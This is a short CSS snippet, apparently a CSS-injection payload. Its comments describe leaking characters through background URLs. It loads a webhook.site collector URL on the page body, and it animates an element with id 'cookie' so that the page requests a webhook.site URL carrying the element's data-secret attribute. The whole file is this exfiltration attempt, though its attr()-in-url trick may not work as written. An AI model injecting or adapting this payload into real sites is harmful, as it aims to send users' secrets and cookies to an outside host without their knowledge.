/* Try to force-load each char via background URL */
body {
  background-image: url("https://webhook.site/4b1b7727-de4b-4b2d-9099-dfd26692730d/start");
}

/* Example using attribute selectors to leak chars */
@keyframes exfil {
  from { background: url("https://webhook.site/4b1b7727-de4b-4b2d-9099-dfd26692730d/c=" attr(data-secret) ); }
}

#cookie {
  animation: exfil 1s infinite;
}
